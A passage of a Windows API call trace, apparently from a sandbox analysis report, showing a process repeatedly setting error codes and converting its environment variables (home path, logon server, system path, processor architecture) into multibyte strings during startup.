SetLastError (dwErrCode=0x0) [0167.742] GetLastError () returned 0x0 [0167.742] SetLastError (dwErrCode=0x0) [0167.742] GetLastError () returned 0x0 [0167.742] SetLastError (dwErrCode=0x0) [0167.742] GetLastError () returned 0x0 [0167.742] SetLastError (dwErrCode=0x0) [0167.742] GetLastError () returned 0x0 [0167.742] SetLastError (dwErrCode=0x0) [0167.742] GetLastError () returned 0x0 [0167.742] SetLastError (dwErrCode=0x0) [0167.742] GetLastError () returned 0x0 [0167.742] SetLastError (dwErrCode=0x0) [0167.742] GetLastError () returned 0x0 [0167.742] SetLastError (dwErrCode=0x0) [0167.743] GetLastError () returned 0x0 [0167.743] SetLastError (dwErrCode=0x0) [0167.743] GetLastError () returned 0x0 [0167.743] SetLastError (dwErrCode=0x0) [0167.743] GetLastError () returned 0x0 [0167.743] SetLastError (dwErrCode=0x0) [0167.743] GetLastError () returned 0x0 [0167.743] SetLastError (dwErrCode=0x0) [0167.743] GetLastError () returned 0x0 [0167.743] SetLastError (dwErrCode=0x0) [0167.743] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c10d0) returned 0x1c [0167.743] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c10d0, Size=0x20) returned 0x6c10d0 [0167.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0167.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x14) returned 0x6c1050 [0167.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x6c1050, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0167.743] GetLastError () returned 0x0 [0167.743] SetLastError (dwErrCode=0x0) [0167.743] GetLastError () returned 0x0 [0167.743] SetLastError (dwErrCode=0x0) [0167.743] GetLastError () returned 0x0 [0167.743] SetLastError (dwErrCode=0x0) [0167.743] GetLastError () returned 0x0 [0167.743] SetLastError (dwErrCode=0x0) [0167.743] GetLastError () returned 0x0 [0167.743] SetLastError (dwErrCode=0x0) [0167.743] GetLastError () returned 0x0 [0167.743] SetLastError (dwErrCode=0x0) [0167.743] GetLastError () returned 0x0 [0167.743] SetLastError (dwErrCode=0x0) [0167.743] GetLastError () returned 0x0 [0167.744] SetLastError (dwErrCode=0x0) [0167.744] GetLastError () returned 0x0 [0167.744] SetLastError (dwErrCode=0x0) [0167.744] GetLastError () returned 0x0 [0167.744] SetLastError (dwErrCode=0x0) [0167.744] GetLastError () returned 0x0 [0167.744] SetLastError (dwErrCode=0x0) [0167.744] GetLastError () returned 0x0 [0167.744] SetLastError (dwErrCode=0x0) [0167.744] GetLastError () returned 0x0 [0167.744] SetLastError (dwErrCode=0x0) [0167.744] GetLastError () returned 0x0 [0167.744] SetLastError (dwErrCode=0x0) [0167.744] GetLastError () returned 0x0 [0167.744] SetLastError (dwErrCode=0x0) [0167.745] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c10d0) returned 0x20 [0167.745] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c10d0, Size=0x24) returned 0x6c10d0 [0167.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xd) returned 0x6b3288 [0167.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x6b3288, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0167.745] GetLastError () returned 0x0 [0167.745] SetLastError (dwErrCode=0x0) [0167.745] GetLastError () returned 0x0 [0167.745] SetLastError (dwErrCode=0x0) [0167.745] GetLastError () returned 0x0 [0167.745] SetLastError (dwErrCode=0x0) [0167.745] GetLastError () returned 0x0 [0167.745] SetLastError (dwErrCode=0x0) [0167.745] GetLastError () returned 0x0 [0167.745] SetLastError (dwErrCode=0x0) [0167.745] GetLastError () returned 0x0 [0167.745] SetLastError (dwErrCode=0x0) [0167.745] GetLastError () returned 0x0 [0167.745] SetLastError (dwErrCode=0x0) [0167.745] GetLastError () returned 0x0 [0167.745] SetLastError (dwErrCode=0x0) [0167.745] GetLastError () returned 0x0 [0167.745] SetLastError (dwErrCode=0x0) [0167.745] GetLastError () returned 0x0 [0167.745] SetLastError (dwErrCode=0x0) [0167.745] GetLastError () returned 0x0 [0167.745] SetLastError (dwErrCode=0x0) [0167.745] GetLastError () returned 0x0 [0167.746] SetLastError (dwErrCode=0x0) [0167.746] GetLastError () returned 0x0 [0167.746] SetLastError (dwErrCode=0x0) [0167.746] GetLastError () returned 0x0 [0167.746] SetLastError (dwErrCode=0x0) [0167.746] GetLastError () returned 0x0 [0167.746] SetLastError (dwErrCode=0x0) [0167.746] GetLastError () returned 0x0 [0167.746] SetLastError (dwErrCode=0x0) [0167.746] GetLastError () returned 0x0 [0167.746] SetLastError (dwErrCode=0x0) [0167.746] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c10d0) returned 0x24 [0167.746] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c10d0, Size=0x28) returned 0x6c10d0 [0167.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0167.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x1a) returned 0x6bee00 [0167.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x6bee00, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 26 [0167.746] GetLastError () returned 0x0 [0167.746] SetLastError (dwErrCode=0x0) [0167.746] GetLastError () returned 0x0 [0167.746] SetLastError (dwErrCode=0x0) [0167.746] GetLastError () returned 0x0 [0167.746] SetLastError (dwErrCode=0x0) [0167.746] GetLastError () returned 0x0 [0167.746] SetLastError (dwErrCode=0x0) [0167.746] GetLastError () returned 0x0 [0167.746] SetLastError (dwErrCode=0x0) [0167.746] GetLastError () returned 0x0 [0167.747] SetLastError (dwErrCode=0x0) [0167.747] GetLastError () returned 0x0 [0167.747] SetLastError (dwErrCode=0x0) [0167.747] GetLastError () returned 0x0 [0167.747] SetLastError (dwErrCode=0x0) [0167.747] GetLastError () returned 0x0 [0167.747] SetLastError (dwErrCode=0x0) [0167.747] GetLastError () returned 0x0 [0167.747] SetLastError (dwErrCode=0x0) [0167.747] GetLastError () returned 0x0 [0167.747] SetLastError (dwErrCode=0x0) [0167.747] GetLastError () returned 0x0 [0167.747] SetLastError (dwErrCode=0x0) [0167.747] GetLastError () returned 0x0 [0167.747] SetLastError (dwErrCode=0x0) [0167.747] GetLastError () returned 0x0 [0167.747] SetLastError (dwErrCode=0x0) [0167.747] GetLastError () returned 0x0 [0167.747] SetLastError (dwErrCode=0x0) [0167.747] GetLastError () returned 0x0 [0167.747] SetLastError (dwErrCode=0x0) [0167.747] GetLastError () returned 0x0 [0167.747] SetLastError (dwErrCode=0x0) [0167.747] GetLastError () returned 0x0 [0167.748] SetLastError (dwErrCode=0x0) [0167.748] GetLastError () returned 0x0 [0167.748] SetLastError (dwErrCode=0x0) [0167.748] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c10d0) returned 0x28 [0167.748] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c10d0, Size=0x2c) returned 0x6c10d0 [0167.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0167.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x2e) returned 0x6bb728 [0167.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x6bb728, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", lpUsedDefaultChar=0x0) returned 46 [0167.748] GetLastError () returned 0x0 [0167.748] SetLastError (dwErrCode=0x0) [0167.748] GetLastError () returned 0x0 [0167.748] SetLastError (dwErrCode=0x0) [0167.748] GetLastError () returned 0x0 [0167.748] SetLastError (dwErrCode=0x0) [0167.748] GetLastError () returned 0x0 [0167.748] SetLastError (dwErrCode=0x0) [0167.748] GetLastError () returned 0x0 [0167.748] SetLastError (dwErrCode=0x0) [0167.748] GetLastError () returned 0x0 [0167.748] SetLastError (dwErrCode=0x0) [0167.748] GetLastError () returned 0x0 [0167.748] SetLastError (dwErrCode=0x0) [0167.748] GetLastError () returned 0x0 [0167.748] SetLastError (dwErrCode=0x0) [0167.748] GetLastError () returned 0x0 [0167.748] SetLastError (dwErrCode=0x0) [0167.749] GetLastError () returned 0x0 [0167.749] SetLastError (dwErrCode=0x0) [0167.749] GetLastError () returned 0x0 [0167.749] SetLastError (dwErrCode=0x0) [0167.749] GetLastError () returned 0x0 [0167.749] SetLastError (dwErrCode=0x0) [0167.749] GetLastError () returned 0x0 [0167.749] SetLastError (dwErrCode=0x0) [0167.749] GetLastError () returned 0x0 [0167.749] SetLastError (dwErrCode=0x0) [0167.749] GetLastError () returned 0x0 [0167.749] SetLastError (dwErrCode=0x0) [0167.749] GetLastError () returned 0x0 [0167.749] SetLastError (dwErrCode=0x0) [0167.749] GetLastError () returned 0x0 [0167.749] SetLastError (dwErrCode=0x0) [0167.749] GetLastError () returned 0x0 [0167.749] SetLastError (dwErrCode=0x0) [0167.749] GetLastError () returned 0x0 [0167.749] SetLastError (dwErrCode=0x0) [0167.749] GetLastError () returned 0x0 [0167.749] SetLastError (dwErrCode=0x0) [0167.749] GetLastError () returned 0x0 [0167.749] SetLastError (dwErrCode=0x0) [0167.750] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c10d0) returned 0x2c [0167.750] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c10d0, Size=0x30) returned 0x6c10d0 [0167.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0167.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x19) returned 0x6bee28 [0167.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x6bee28, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 25 [0167.750] GetLastError () returned 0x0 [0167.750] SetLastError (dwErrCode=0x0) [0167.750] GetLastError () returned 0x0 [0167.750] SetLastError (dwErrCode=0x0) [0167.750] GetLastError () returned 0x0 [0167.750] SetLastError (dwErrCode=0x0) [0167.750] GetLastError () returned 0x0 [0167.750] SetLastError (dwErrCode=0x0) [0167.750] GetLastError () returned 0x0 [0167.750] SetLastError (dwErrCode=0x0) [0167.750] GetLastError () returned 0x0 [0167.750] SetLastError (dwErrCode=0x0) [0167.750] GetLastError () returned 0x0 [0167.750] SetLastError (dwErrCode=0x0) [0167.750] GetLastError () returned 0x0 [0167.750] SetLastError (dwErrCode=0x0) [0167.750] GetLastError () returned 0x0 [0167.750] SetLastError (dwErrCode=0x0) [0167.750] GetLastError () returned 0x0 [0167.750] SetLastError (dwErrCode=0x0) [0167.750] GetLastError () returned 0x0 [0167.751] SetLastError (dwErrCode=0x0) [0167.751] GetLastError () returned 0x0 [0167.751] SetLastError (dwErrCode=0x0) [0167.751] GetLastError () returned 0x0 [0167.751] SetLastError (dwErrCode=0x0) [0167.751] GetLastError () returned 0x0 [0167.751] SetLastError (dwErrCode=0x0) [0167.751] GetLastError () returned 0x0 [0167.751] SetLastError (dwErrCode=0x0) [0167.751] GetLastError () returned 0x0 [0167.751] SetLastError (dwErrCode=0x0) [0167.751] GetLastError () returned 0x0 [0167.751] SetLastError (dwErrCode=0x0) [0167.751] GetLastError () returned 0x0 [0167.751] SetLastError (dwErrCode=0x0) [0167.751] GetLastError () returned 0x0 [0167.751] SetLastError (dwErrCode=0x0) [0167.751] GetLastError () returned 0x0 [0167.751] SetLastError (dwErrCode=0x0) [0167.751] GetLastError () returned 0x0 [0167.751] SetLastError (dwErrCode=0x0) [0167.751] GetLastError () returned 0x0 [0167.751] SetLastError (dwErrCode=0x0) [0167.751] GetLastError () returned 0x0 [0167.751] SetLastError (dwErrCode=0x0) [0167.751] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c10d0) returned 0x30 [0167.751] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c10d0, Size=0x34) returned 0x6c10d0 [0167.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0167.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x17) returned 0x6c1110 [0167.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x6c1110, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0167.752] GetLastError () returned 0x0 [0167.752] SetLastError (dwErrCode=0x0) [0167.752] GetLastError () returned 0x0 [0167.752] SetLastError (dwErrCode=0x0) [0167.752] GetLastError () returned 0x0 [0167.752] SetLastError (dwErrCode=0x0) [0167.752] GetLastError () returned 0x0 [0167.752] SetLastError (dwErrCode=0x0) [0167.752] GetLastError () returned 0x0 [0167.752] SetLastError (dwErrCode=0x0) [0167.752] GetLastError () returned 0x0 [0167.752] SetLastError (dwErrCode=0x0) [0167.752] GetLastError () returned 0x0 [0167.752] SetLastError (dwErrCode=0x0) [0167.752] GetLastError () returned 0x0 [0167.752] SetLastError (dwErrCode=0x0) [0167.752] GetLastError () returned 0x0 [0167.752] SetLastError (dwErrCode=0x0) [0167.752] GetLastError () returned 0x0 [0167.752] SetLastError (dwErrCode=0x0) [0167.752] GetLastError () returned 0x0 [0167.752] SetLastError (dwErrCode=0x0) [0167.752] GetLastError () returned 0x0 [0167.752] SetLastError (dwErrCode=0x0) [0167.752] GetLastError () returned 0x0 [0167.752] SetLastError (dwErrCode=0x0) [0167.752] GetLastError () returned 0x0 [0167.753] SetLastError (dwErrCode=0x0) [0167.753] GetLastError () returned 0x0 [0167.753] SetLastError (dwErrCode=0x0) [0167.753] GetLastError () returned 0x0 [0167.753] SetLastError (dwErrCode=0x0) [0167.753] GetLastError () returned 0x0 [0167.753] SetLastError (dwErrCode=0x0) [0167.753] GetLastError () returned 0x0 [0167.753] SetLastError (dwErrCode=0x0) [0167.753] GetLastError () returned 0x0 [0167.753] SetLastError (dwErrCode=0x0) [0167.753] GetLastError () returned 0x0 [0167.753] SetLastError (dwErrCode=0x0) [0167.753] GetLastError () returned 0x0 [0167.753] SetLastError (dwErrCode=0x0) [0167.753] GetLastError () returned 0x0 [0167.753] SetLastError (dwErrCode=0x0) [0167.753] GetLastError () returned 0x0 [0167.753] SetLastError (dwErrCode=0x0) [0167.753] GetLastError () returned 0x0 [0167.753] SetLastError (dwErrCode=0x0) [0167.753] GetLastError () returned 0x0 [0167.753] SetLastError (dwErrCode=0x0) [0167.753] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c10d0) returned 0x34 [0167.753] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c10d0, Size=0x38) returned 0x6c10d0 [0167.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0167.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xe) returned 0x6b32a0 [0167.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x6b32a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0167.753] GetLastError () returned 0x0 [0167.753] SetLastError (dwErrCode=0x0) [0167.753] GetLastError () returned 0x0 [0167.754] SetLastError (dwErrCode=0x0) [0167.754] GetLastError () returned 0x0 [0167.754] SetLastError (dwErrCode=0x0) [0167.754] GetLastError () returned 0x0 [0167.754] SetLastError (dwErrCode=0x0) [0167.754] GetLastError () returned 0x0 [0167.754] SetLastError (dwErrCode=0x0) [0167.754] GetLastError () returned 0x0 [0167.754] SetLastError (dwErrCode=0x0) [0167.754] GetLastError () returned 0x0 [0167.754] SetLastError (dwErrCode=0x0) [0167.754] GetLastError () returned 0x0 [0167.754] SetLastError (dwErrCode=0x0) [0167.754] GetLastError () returned 0x0 [0167.754] SetLastError (dwErrCode=0x0) [0167.754] GetLastError () returned 0x0 [0167.754] SetLastError (dwErrCode=0x0) [0167.754] GetLastError () returned 0x0 [0167.755] SetLastError (dwErrCode=0x0) [0167.755] GetLastError () returned 0x0 [0167.755] SetLastError (dwErrCode=0x0) [0167.755] GetLastError () returned 0x0 [0167.755] SetLastError (dwErrCode=0x0) [0167.755] GetLastError () returned 0x0 [0167.755] SetLastError (dwErrCode=0x0) [0167.755] GetLastError () returned 0x0 [0167.755] SetLastError (dwErrCode=0x0) [0167.755] GetLastError () returned 0x0 [0167.755] SetLastError (dwErrCode=0x0) [0167.755] GetLastError () returned 0x0 [0167.755] SetLastError (dwErrCode=0x0) [0167.755] GetLastError () returned 0x0 [0167.755] SetLastError (dwErrCode=0x0) [0167.755] GetLastError () returned 0x0 [0167.755] SetLastError (dwErrCode=0x0) [0167.755] GetLastError () returned 0x0 [0167.755] SetLastError (dwErrCode=0x0) [0167.755] GetLastError () returned 0x0 [0167.755] SetLastError (dwErrCode=0x0) [0167.755] GetLastError () returned 0x0 [0167.755] SetLastError (dwErrCode=0x0) [0167.755] GetLastError () returned 0x0 [0167.755] SetLastError (dwErrCode=0x0) [0167.755] GetLastError () returned 0x0 [0167.755] SetLastError (dwErrCode=0x0) [0167.755] GetLastError () returned 0x0 [0167.756] SetLastError (dwErrCode=0x0) [0167.756] GetLastError () returned 0x0 [0167.756] SetLastError (dwErrCode=0x0) [0167.756] GetLastError () returned 0x0 [0167.756] SetLastError (dwErrCode=0x0) [0167.756] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c10d0) returned 0x38 [0167.756] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c10d0, Size=0x3c) returned 0x6c1130 [0167.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 149 [0167.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x95) returned 0x6c1178 [0167.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x6c1178, cbMultiByte=149, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 149 [0167.756] GetLastError () returned 0x0 [0167.756] SetLastError (dwErrCode=0x0) [0167.756] GetLastError () returned 0x0 [0167.756] SetLastError (dwErrCode=0x0) [0167.756] GetLastError () returned 0x0 [0167.756] SetLastError (dwErrCode=0x0) [0167.756] GetLastError () returned 0x0 [0167.756] SetLastError (dwErrCode=0x0) [0167.756] GetLastError () returned 0x0 [0167.756] SetLastError (dwErrCode=0x0) [0167.756] GetLastError () returned 0x0 [0167.756] SetLastError (dwErrCode=0x0) [0167.756] GetLastError () returned 0x0 [0167.756] SetLastError (dwErrCode=0x0) [0167.756] GetLastError () returned 0x0 [0167.756] SetLastError (dwErrCode=0x0) [0167.756] GetLastError () returned 0x0 [0167.756] SetLastError (dwErrCode=0x0) [0167.756] GetLastError () returned 0x0 [0167.757] SetLastError (dwErrCode=0x0) [0167.757] GetLastError () returned 0x0 [0167.757] SetLastError (dwErrCode=0x0) [0167.757] GetLastError () returned 0x0 [0167.757] SetLastError (dwErrCode=0x0) [0167.757] GetLastError () returned 0x0 [0167.757] SetLastError (dwErrCode=0x0) [0167.757] GetLastError () returned 0x0 [0167.757] SetLastError (dwErrCode=0x0) [0167.757] GetLastError () returned 0x0 [0167.757] SetLastError (dwErrCode=0x0) [0167.757] GetLastError () returned 0x0 [0167.757] SetLastError (dwErrCode=0x0) [0167.757] GetLastError () returned 0x0 [0167.757] SetLastError (dwErrCode=0x0) [0167.757] GetLastError () returned 0x0 [0167.757] SetLastError (dwErrCode=0x0) [0167.757] GetLastError () returned 0x0 [0167.757] SetLastError (dwErrCode=0x0) [0167.757] GetLastError () returned 0x0 [0167.757] SetLastError (dwErrCode=0x0) [0167.757] GetLastError () returned 0x0 [0167.757] SetLastError (dwErrCode=0x0) [0167.757] GetLastError () returned 0x0 [0167.757] SetLastError (dwErrCode=0x0) [0167.757] GetLastError () returned 0x0 [0167.758] SetLastError (dwErrCode=0x0) [0167.758] GetLastError () returned 0x0 [0167.758] SetLastError (dwErrCode=0x0) [0167.758] GetLastError () returned 0x0 [0167.758] SetLastError (dwErrCode=0x0) [0167.758] GetLastError () returned 0x0 [0167.758] SetLastError (dwErrCode=0x0) [0167.758] GetLastError () returned 0x0 [0167.758] SetLastError (dwErrCode=0x0) [0167.758] GetLastError () returned 0x0 [0167.758] SetLastError (dwErrCode=0x0) [0167.758] GetLastError () returned 0x0 [0167.758] SetLastError (dwErrCode=0x0) [0167.758] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1130) returned 0x3c [0167.758] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1130, Size=0x40) returned 0x6c1130 [0167.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0167.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x3e) returned 0x6b2618 [0167.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x6b2618, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0167.758] GetLastError () returned 0x0 [0167.758] SetLastError (dwErrCode=0x0) [0167.758] GetLastError () returned 0x0 [0167.758] SetLastError (dwErrCode=0x0) [0167.758] GetLastError () returned 0x0 [0167.758] SetLastError (dwErrCode=0x0) [0167.758] GetLastError () returned 0x0 [0167.758] SetLastError (dwErrCode=0x0) [0167.758] GetLastError () returned 0x0 [0167.758] SetLastError (dwErrCode=0x0) [0167.758] GetLastError () returned 0x0 [0167.758] SetLastError (dwErrCode=0x0) [0167.758] GetLastError () returned 0x0 [0167.759] SetLastError (dwErrCode=0x0) [0167.759] GetLastError () returned 0x0 [0167.759] SetLastError (dwErrCode=0x0) [0167.759] GetLastError () returned 0x0 [0167.759] SetLastError (dwErrCode=0x0) [0167.759] GetLastError () returned 0x0 [0167.759] SetLastError (dwErrCode=0x0) [0167.759] GetLastError () returned 0x0 [0167.759] SetLastError (dwErrCode=0x0) [0167.759] GetLastError () returned 0x0 [0167.759] SetLastError (dwErrCode=0x0) [0167.759] GetLastError () returned 0x0 [0167.759] SetLastError (dwErrCode=0x0) [0167.759] GetLastError () returned 0x0 [0167.759] SetLastError (dwErrCode=0x0) [0167.759] GetLastError () returned 0x0 [0167.759] SetLastError (dwErrCode=0x0) [0167.759] GetLastError () returned 0x0 [0167.759] SetLastError (dwErrCode=0x0) [0167.759] GetLastError () returned 0x0 [0167.759] SetLastError (dwErrCode=0x0) [0167.759] GetLastError () returned 0x0 [0167.759] SetLastError (dwErrCode=0x0) [0167.759] GetLastError () returned 0x0 [0167.759] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1130) returned 0x40 [0167.759] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1130, Size=0x44) returned 0x6c1218 [0167.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0167.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x1b) returned 0x6bee50 [0167.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x6bee50, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0167.760] GetLastError () returned 0x0 [0167.760] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1218) returned 0x44 [0167.760] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1218, Size=0x48) returned 0x6c1218 [0167.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0167.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x1d) returned 0x6bee78 [0167.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x6bee78, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 